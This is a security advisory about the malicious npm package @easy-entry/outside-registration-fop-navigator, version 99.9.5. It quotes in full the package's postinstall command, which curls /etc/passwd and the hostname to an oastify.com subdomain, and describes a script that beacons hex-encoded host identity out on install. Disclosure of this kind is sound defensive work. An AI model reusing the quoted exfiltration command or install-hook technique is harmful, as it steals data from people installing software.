VYPR

npm · Malicious package advisory

Malware

@easy-entry/outside-registration-fop-navigator

MAL-2026-5409

Malicious code in @easy-entry/outside-registration-fop-navigator (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (04091b4e3c6018586c8ba0c6106ff9177090d0776d1a723d041a76d67b1c8f2b)
On `npm install`, package.json's postinstall hook executes `node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com`, sending the installer's /etc/passwd contents and hostname to a Burp Collaborator subdomain. In parallel, scripts/scream3gg.js hex-encodes os.hostname(), os.homedir(), and os.userInfo().username and issues a fetch to `http://<hex>.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com`, leaking installer host identity through DNS/HTTP to the attacker. Both behaviors fire automatically and unconditionally on default install.

Compromised versions (1)

  • 99.9.5

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.